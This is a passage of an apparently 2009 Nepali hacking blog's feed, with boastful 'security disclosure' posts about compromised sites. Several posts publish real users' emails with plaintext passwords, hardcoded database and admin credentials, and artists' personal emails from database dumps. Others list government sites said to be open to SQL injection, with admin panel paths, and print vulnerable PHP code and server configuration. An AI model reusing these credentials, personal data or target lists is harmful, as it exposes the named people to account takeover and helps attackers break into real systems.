Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-5185687282083310144</id><published>2009-10-31T22:00:00.001-07:00</published><updated>2009-10-31T22:00:40.896-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='placementnepal.com'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><title type='text'>placementNepal.com Security Disclosure</title><content type='html'>I hate placementnepal.com and its parent hitechacademy. They say they have the best coder but their coders suck. Owning placementNepal.com was not a big deal as they don't know what security is and hence, can't secure themselves.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Interesting tables in the database of placementNepal:&lt;br /&gt;&lt;br /&gt;clients&lt;br /&gt;&lt;br /&gt;cusers&lt;br /&gt;&lt;br /&gt;privileges&lt;br /&gt;&lt;br /&gt;recruitusers&lt;br /&gt;&lt;br /&gt;userprivileges&lt;br /&gt;&lt;br /&gt;users&lt;br /&gt;&lt;br /&gt;uusers&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;And they don't put your passwords encrypted in their database. So don't reuse your email accounts and other passwords in placementNepal.com.&lt;br /&gt;&lt;br /&gt;Some sample login examples:&lt;br /&gt;&lt;br /&gt;Email: Password&lt;br /&gt;&lt;br /&gt;amrit_giri@hotmail.com: rrihchaa&lt;br /&gt;&lt;br /&gt;rikesh_eikir@hotmail.com: haratimaan07&lt;br /&gt;&lt;br /&gt;merhythm@hotmail.com: 24*365sweta&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;No more disclosure. Sorry to those whose emails were selected randomly...&lt;br /&gt;&lt;br /&gt;Thank you and Happy Hacking... :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-5185687282083310144?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/5185687282083310144/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/placementnepalcom-security-disclosure.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/5185687282083310144'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/5185687282083310144'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/placementnepalcom-security-disclosure.html' title='placementNepal.com Security Disclosure'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-1396089832633075605</id><published>2009-10-31T21:55:00.001-07:00</published><updated>2009-10-31T21:56:51.709-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ntc.net.np'/><category scheme='http://www.blogger.com/atom/ns#' term='phpinfo'/><title type='text'>Nepal telecom phpinfo() disclosure</title><content type='html'>Cyb3r Lord had previously posted the hacks that can be used to exploit NTC website. He also talked about php info in NTC site. However, he didn't share the contents of php info of NTC. So I thought to share it with you guys.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&amp;lt;?php&lt;br /&gt;&lt;br /&gt;phpinfo();&lt;br /&gt;&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Some parts from it:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;System  Linux bhadrakali.ntc.net.np 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007 i686&lt;br /&gt;&lt;br /&gt;Build Date  Jul 16 2008 19:54:37&lt;br /&gt;&lt;br /&gt;Server API  Apache 2.0 Handler &lt;br /&gt;&lt;br /&gt;PHP.INI path /etc/php.ini&lt;br /&gt;&lt;br /&gt;allow_url_fopen On On&lt;br /&gt;&lt;br /&gt;expose_php On On&lt;br /&gt;&lt;br /&gt;magic_quotes_gpc On On&lt;br /&gt;&lt;br /&gt;magic_quotes_runtime Off Off&lt;br /&gt;&lt;br /&gt;register_globals On On&lt;br /&gt;&lt;br /&gt;safe_mode Off Off&lt;br /&gt;&lt;br /&gt;SMTP seti.ntc.net.np seti.ntc.net.np&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Why the hell are they keeping register_globals on; sucks... And why would they like to turn on allow_url_fopen. Learn some security. Other critical informations not disclosed over here.&lt;br /&gt;&lt;br /&gt;Thanks&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-1396089832633075605?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/1396089832633075605/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/cyb3r-lord-had-previously-posted-hacks.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/1396089832633075605'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/1396089832633075605'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/cyb3r-lord-had-previously-posted-hacks.html' title='Nepal telecom phpinfo() disclosure'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-8404690659952335470</id><published>2009-10-31T21:53:00.000-07:00</published><updated>2009-10-31T21:53:25.362-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hitechacademy.com.np'/><category scheme='http://www.blogger.com/atom/ns#' term='local file inclusion'/><category scheme='http://www.blogger.com/atom/ns#' term='lfi'/><title type='text'>Hitechacademy Security Disclosure</title><content type='html'>Hi there,&lt;br /&gt;&lt;br /&gt;in this post, I am going to disclose the security issues of hitech academy which gives computer training to many students. Though it says its one of the best from Nepal, it knows nothing about security. So I thought to disclose them...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Learn some coding Hitech guys, the manager had told me in my interview that he has got some best paid programmers from Nepal and you(means I) can't compete with them, so sorry for this time.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;From index.php:&lt;br /&gt;&lt;br /&gt;if(isset($_GET['action']))&lt;br /&gt;&lt;br /&gt;    {&lt;br /&gt;&lt;br /&gt;     include("includes/".$_GET['action'].".php");   &lt;br /&gt;&lt;br /&gt;    }&lt;br /&gt;&lt;br /&gt;    &lt;br /&gt;&lt;br /&gt;WTF? Don't you know how to validate variables. Sucks... Poor coding.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;From DBConnection file:&lt;br /&gt;&lt;br /&gt;&amp;lt;?php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$dbuser="hitechac_hitech";&lt;br /&gt;&lt;br /&gt;$dbpassword="hitech";&lt;br /&gt;&lt;br /&gt;$database="hitechac_hitech";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$host = "localhost";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$ado=new data($host,$dbuser,$dbpassword,$database);&lt;br /&gt;&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;From one of the functions file:&lt;br /&gt;&lt;br /&gt;function adminLogin($username, $password)&lt;br /&gt;&lt;br /&gt; {&lt;br /&gt;&lt;br /&gt;  global $ado;&lt;br /&gt;&lt;br /&gt;  global $userGroups;&lt;br /&gt;&lt;br /&gt;  &lt;br /&gt;&lt;br /&gt;  $sql = "SELECT u.* FROM users u, usergroups ug WHERE u.username = '$username' AND u.password = '$password'&lt;br /&gt;&lt;br /&gt;       AND u.userGroupId = ug.id AND ug.name = 'admin'";&lt;br /&gt;&lt;br /&gt;  $result = $ado-&gt;exec($sql);&lt;br /&gt;&lt;br /&gt;  &lt;br /&gt;&lt;br /&gt;  if ($ado-&gt;count_row($result) &gt; 0)&lt;br /&gt;&lt;br /&gt;  {&lt;br /&gt;&lt;br /&gt;   //login successful&lt;br /&gt;&lt;br /&gt;   &lt;br /&gt;&lt;br /&gt;   $row = $ado-&gt;fetch_array($result);&lt;br /&gt;&lt;br /&gt;   &lt;br /&gt;&lt;br /&gt;   $_SESSION['userId'] = $row['id'];&lt;br /&gt;&lt;br /&gt;   $_SESSION['userFullname'] = $row['fullname'];&lt;br /&gt;&lt;br /&gt;   $_SESSION['userUsername'] = $row['username'];&lt;br /&gt;&lt;br /&gt;   $_SESSION['userGroupId'] = $row['userGroupId'];&lt;br /&gt;&lt;br /&gt;   &lt;br /&gt;&lt;br /&gt;   $gResult = $userGroups-&gt;getById($row['userGroupId']);&lt;br /&gt;&lt;br /&gt;   $gRow = $ado-&gt;fetch_array($gResult);&lt;br /&gt;&lt;br /&gt;   &lt;br /&gt;&lt;br /&gt;   $_SESSION['userGroupPower'] = $gRow['power'];&lt;br /&gt;&lt;br /&gt;   $_SESSION['userGroupName'] = $gRow['name'];&lt;br /&gt;&lt;br /&gt;   &lt;br /&gt;&lt;br /&gt;   return true;&lt;br /&gt;&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;  //invalid login&lt;br /&gt;&lt;br /&gt;  return false;&lt;br /&gt;&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;WTF? Don't you know SQLi vuln is very bad.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hitech email login PHP script snippet:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;?&lt;br /&gt;&lt;br /&gt;session_start();&lt;br /&gt;&lt;br /&gt;if (isset($_POST['Submit']))&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt; if ($_POST['username'] == "hitechemail" &amp;&amp; $_POST['password'] == "emailhitech")&lt;br /&gt;&lt;br /&gt; {&lt;br /&gt;&lt;br /&gt;  $_SESSION['userId'] = "hitech";&lt;br /&gt;&lt;br /&gt;  header("Location: index.php");&lt;br /&gt;&lt;br /&gt;  exit();&lt;br /&gt;&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;LOL... passes in normal form. Learn to use md5(), hitech.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To Hitech Academy, please make corrections in the following informations from your site(Do not hide the truth from your clients; just say how lame you are...):&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;HiTech Academy is an institution established with the aim of providing (non-)quality education and training in the field of Basic (and Advance; remove this) Computing, Computer Accounting, Hardware and Networking, (Add insecure) Computer Programming, Web Designing, Tele-communications, English Language and Personality Development and a host of other allied subjects. It also provides job placement services to its students as well as other job seekers.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-8404690659952335470?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/8404690659952335470/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/hitechacademy-security-disclosure.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/8404690659952335470'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/8404690659952335470'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/hitechacademy-security-disclosure.html' title='Hitechacademy Security Disclosure'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-1849221567852571312</id><published>2009-10-31T21:50:00.001-07:00</published><updated>2009-10-31T21:54:26.081-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='lfi'/><category scheme='http://www.blogger.com/atom/ns#' term='himaltech.com'/><title type='text'>HimalTech [ISP] Security Disclosure</title><content type='html'>This is a minor one(at least I think). Himaltech is a ISP from Nepal (though I had never heard it). First think, don't host on Windows system; use free and open source Linux distro... They are cheaper, I think.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;From index.php(exploitable snippet):&lt;br /&gt;&lt;br /&gt;if(($p == "") &amp;&amp; ($q != "")){&lt;br /&gt;&lt;br /&gt;$filename = $q;&lt;br /&gt;&lt;br /&gt;} elseif($p != ""){&lt;br /&gt;&lt;br /&gt;$filename = $p."/content";&lt;br /&gt;&lt;br /&gt;} else {&lt;br /&gt;&lt;br /&gt;$filename = "home";&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;include($filename.$ext);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;WTF? How are you making includes. Fucking noobish.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;From one of the PHP scripts:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$query = "UPDATE newsFeed set date='". $_POST['dated'] ."' WHERE id='". $_POST['id'] ."'";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Oh hell. learn to validate the inputs. What would have happened if an evil user had submitted some malformed information.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Some configs from the functions.php:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;?php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$isp[lname] = "HimalTech Internet Services";&lt;br /&gt;&lt;br /&gt;$isp[sname] = "HimalTech";&lt;br /&gt;&lt;br /&gt;$isp[sup_tel] = "443-9541, 01-621-8615";&lt;br /&gt;&lt;br /&gt;$isp[gen_tel] = "+977 (1) 44 39 541";&lt;br /&gt;&lt;br /&gt;$isp[sup_email] = "support@himaltech.com";&lt;br /&gt;&lt;br /&gt;$isp[gen_email] = "info@himaltech.com";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$radHost = "himaltech.com";&lt;br /&gt;&lt;br /&gt;$radUser = "phpmgmt";&lt;br /&gt;&lt;br /&gt;$radPass = "**EDITED**";&lt;br /&gt;&lt;br /&gt;$radName = "radius";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$newsHost = localhost;&lt;br /&gt;&lt;br /&gt;$newsUser = "himal";&lt;br /&gt;&lt;br /&gt;$newsPass = "**EDITED**";&lt;br /&gt;&lt;br /&gt;$newsName = "ht";&lt;br /&gt;&lt;br /&gt;............&lt;br /&gt;&lt;br /&gt;...........&lt;br /&gt;&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;And some arrays:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$nas = array(&lt;br /&gt;&lt;br /&gt;"69.88.8.94" =&gt; array("port" =&gt; 30, "name" =&gt; "Dhau"),&lt;br /&gt;&lt;br /&gt;"10.0.0.3" =&gt; array("port" =&gt; 30, "name" =&gt; "vold_dhau"),&lt;br /&gt;&lt;br /&gt;"202.161.146.197" =&gt; array("port" =&gt; 30, "name" =&gt; "old_dhau"),&lt;br /&gt;&lt;br /&gt;"202.161.146.209" =&gt; array("port" =&gt; 30, "name" =&gt; "dhauold")&lt;br /&gt;&lt;br /&gt;);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So that was the show on himaltech. Happy hacking!!! :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-1849221567852571312?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/1849221567852571312/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/this-is-minor-oneat-least-i-think.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/1849221567852571312'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/1849221567852571312'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/this-is-minor-oneat-least-i-think.html' title='HimalTech [ISP] Security Disclosure'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-4633494586852218215</id><published>2009-10-31T21:48:00.000-07:00</published><updated>2009-10-31T21:48:57.875-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='gov.np'/><category scheme='http://www.blogger.com/atom/ns#' term='government sites'/><title type='text'>Government sites SQLi vulnerabilities series I</title><content type='html'>Most of the Nepali government sites are not updated and also are pretty insecure. So here I have thought to list some of the hackable government sites.&lt;br /&gt;&lt;br /&gt;Risk: Various&lt;br /&gt;&lt;br /&gt;Dork: WTF? Figure yourself...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.Can.gov.np:&lt;br /&gt;&lt;br /&gt;Path: /web/vhosts/can.gov.np/httpdocs/&lt;br /&gt;&lt;br /&gt;Vuln: SQLi&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.ccwb.gov.np&lt;br /&gt;&lt;br /&gt;Vuln: SQLi&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.dfrs.gov.np:&lt;br /&gt;&lt;br /&gt;Vuln: SQLi&lt;br /&gt;&lt;br /&gt;Admin panel: http://www.dfrs.gov.np/admin/login.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.dhm.gov.np:&lt;br /&gt;&lt;br /&gt;Vuln: SQLi&lt;br /&gt;&lt;br /&gt;Admin panel: /dhmadmin&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.dvsdt.gov.np:&lt;br /&gt;&lt;br /&gt;Vuln: SQLi&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.kathmandu.gov.np:&lt;br /&gt;&lt;br /&gt;Vuln: SQLi&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.mofsc.gov.np:&lt;br /&gt;&lt;br /&gt;Vuln: SQLi&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.moi.gov.np:&lt;br /&gt;&lt;br /&gt;Vuln: SQLi&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.npc.gov.np:&lt;br /&gt;&lt;br /&gt;Vuln: SQLi&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://tourismnepal.gov.np:&lt;br /&gt;&lt;br /&gt;Vuln: SQLi&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.moe.gov.np&lt;br /&gt;&lt;br /&gt;Vuln: SQLi&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;There are more vulnerable sites... These were just the examples... They are vulnerable to the most common exploit (SQL injection) which can be even done by fucking script kiddes. This post is the message to the government bodies to secure their site...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Below are sample PHP snippets from Can.gov.np&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;From index.php&lt;br /&gt;&lt;br /&gt;&amp;lt;?&lt;br /&gt;&lt;br /&gt;//session_start();&lt;br /&gt;&lt;br /&gt;include "admin/dbconn.php";&lt;br /&gt;&lt;br /&gt;//Global.php gets language setting and returns $SEL_LANGUAGE=en or np&lt;br /&gt;&lt;br /&gt;include "global.php";&lt;br /&gt;&lt;br /&gt;//Parameters depending on Language settings&lt;br /&gt;&lt;br /&gt;include "myvar.php";&lt;br /&gt;&lt;br /&gt;include "removetags.php";&lt;br /&gt;&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;From one of the scripts(not disclosed to prevent script kiddies)&lt;br /&gt;&lt;br /&gt;$queryParent="select $THE_SEC from tblsections where secid=$secid and attrib='P'";&lt;br /&gt;&lt;br /&gt;     $resultParent=mysql_query($queryParent);&lt;br /&gt;&lt;br /&gt;     $rowParent=mysql_fetch_row($resultParent);&lt;br /&gt;&lt;br /&gt;     $secName=$rowParent[0];&lt;br /&gt;&lt;br /&gt;     //Get Section Content&lt;br /&gt;&lt;br /&gt;     $queryParent="select $SEC_CONTENT from $ContentTable where secid=$secid and attrib='P' order by contentdate desc";&lt;br /&gt;&lt;br /&gt;     $resultParent=mysql_query($queryParent);&lt;br /&gt;&lt;br /&gt;     $rowParent=mysql_fetch_row($resultParent);&lt;br /&gt;&lt;br /&gt;     $secContent=str_replace("THE_ANT_SINGLE_QUOTE","'",$rowParent[0]);&lt;br /&gt;&lt;br /&gt;     $secContent=str_replace("opensection.secid:","**editedByMe**",$secContent);&lt;br /&gt;&lt;br /&gt;     &lt;br /&gt;&lt;br /&gt;From dbconn.php&lt;br /&gt;&lt;br /&gt;&amp;lt;?&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;&lt;br /&gt;$datahost = "localhost";&lt;br /&gt;&lt;br /&gt;$dbusername = "root";&lt;br /&gt;&lt;br /&gt;$dbuserpass = "";&lt;br /&gt;&lt;br /&gt;$database = "can_gov_np";&lt;br /&gt;&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$datahost = "127.0.0.1";&lt;br /&gt;&lt;br /&gt;$dbusername = "can";&lt;br /&gt;&lt;br /&gt;$dbuserpass = "**EDITED**";&lt;br /&gt;&lt;br /&gt;$database = "can_gov_np";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;// Database Server Connection&lt;br /&gt;&lt;br /&gt;  $link = mysql_connect("$datahost", "$dbusername", "$dbuserpass")&lt;br /&gt;&lt;br /&gt;        or die("Could not connect : " . mysql_error());&lt;br /&gt;&lt;br /&gt;    //  print "Connected successfully &lt;br&gt;";&lt;br /&gt;&lt;br /&gt;// Database Connection&lt;br /&gt;&lt;br /&gt;  mysql_select_db("$database") or die("Could not select database");&lt;br /&gt;&lt;br /&gt; //  print "Database Selected successfully &lt;br&gt;";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Thanks for reading this...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-4633494586852218215?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/4633494586852218215/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/government-sites-sqli-vulnerabilities.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/4633494586852218215'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/4633494586852218215'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/10/government-sites-sqli-vulnerabilities.html' title='Government sites SQLi vulnerabilities series I'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-2484764720818201263</id><published>2009-10-31T21:45:00.000-07:00</published><updated>2009-10-31T21:45:28.849-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='cybersansar.com'/><title type='text'>CyberSansar Database Disclosure</title><content type='html'>Not much important here (is old one) but still thought to share these. You know cybersansar.com is one of the most visited sites from Nepal and still its vulnerable to SQLi and XSS. They need to learn codings. Anyway today I am going to show you some old DB dumps of cybersansar.com (I think most of these are still the same at present, too.)&lt;br /&gt;Lets start:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Cyber Sansar virtual host info&lt;/b&gt;:&lt;br /&gt;&lt;br /&gt;####cybersansar.com&lt;br /&gt;&lt;virtualhost 202.79.32.62:80=""&gt;&lt;br /&gt;ServerAdmin webmaster@cybersansar.com&lt;br /&gt;DocumentRoot /web/vhosts/cybernepal.com.np/httpdocs&lt;br /&gt;ServerName cybersansar.com&lt;br /&gt;ServerAlias www.cybersansar.com&lt;br /&gt;&lt;br /&gt;##PHP / phpmyadmin&lt;br /&gt;php_value register_globals "on"&lt;br /&gt;Include /etc/apache/modules.d/vhosts_modphp&lt;br /&gt;Include /etc/apache/modules.d/vhosts_phpmyadmin&lt;br /&gt;&lt;br /&gt;## htpasswd&lt;br /&gt;Include /etc/apache/extra/cybernepal_include&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;## ReWrite Module&lt;br /&gt;RewriteEngine on&lt;br /&gt;RewriteCond %{HTTP_HOST}                !^202.79.32.62(:80)?$&lt;br /&gt;RewriteCond %{HTTP_HOST}                !^www.cybersansar.com(:80)?$&lt;br /&gt;RewriteRule ^/(.*)                      http://www.cybersansar.com/$1 [L,R]&lt;br /&gt;RewriteOptions inherit&lt;br /&gt;RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)&lt;br /&gt;RewriteRule .* - [F]&lt;br /&gt;&lt;br /&gt;ErrorLog /web/vhosts/cybernepal.com.np/logs/error.log&lt;br /&gt;CustomLog /web/vhosts/cybernepal.com.np/logs/access.log common&lt;br /&gt;&lt;br /&gt;&lt;/virtualhost&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;DB Dumps&lt;/b&gt;:&lt;br /&gt;INSERT INTO `logonuser` VALUES ('cardb', 'ptcn');&lt;br /&gt;INSERT INTO `logonuser` VALUES ('admin', 'rajendra1');&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Emails of artists&lt;/b&gt;:&lt;br /&gt;Manoj Shrestha: manoz@manozshrestha.com&lt;br /&gt;Nalina Chitrakar: nalina_chitrakar@hotmail.com&lt;br /&gt;Girish: diseezgirish@hotmail.com&lt;br /&gt;Pramod Upadhyaya: cabbageheart@hotmail.com&lt;br /&gt;Sarisma Amatya: sarishmaamatya@hotmail.com&lt;br /&gt;Deepesh Kishor Bhattarai: deepeshforever@hotmail.com&lt;br /&gt;Prem Lama: lamaprem_7@hotmail.com&lt;br /&gt;Avinash Ghishing: generation_np@hotmail.com&lt;br /&gt;Sabin Rai: mesabin03@yahoo.com&lt;br /&gt;Prashna Shakya: prashnas@gmail.com&lt;br /&gt;Mausami Gurung: mausamigurung4@yahoo.com&lt;br /&gt;Abhaya Subba: bacchus_21@yahoo.com&lt;br /&gt;Sudin Pokhrel: itsda69@hotmail.com&lt;br /&gt;Mingma Sherpa: feelmingma@hotmail.com&lt;br /&gt;Resma Sunuwar: resmires@hotmail.com&lt;br /&gt;&lt;br /&gt;I just selected few of them from DB. There were more... Also, the DB dump revealed phone numbers of around 116 singers/artists. Do not contact me to send you the phone numbers of the singers unless you have some genuine reason (hardcore fan, need to give me proof).&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Tables in CyberSansar's DB&lt;/b&gt;:&lt;br /&gt;adminlogin&lt;br /&gt;artist_info&lt;br /&gt;artist_info2&lt;br /&gt;cs_adminuser&lt;br /&gt;cs_menucategory&lt;br /&gt;cs_model_info&lt;br 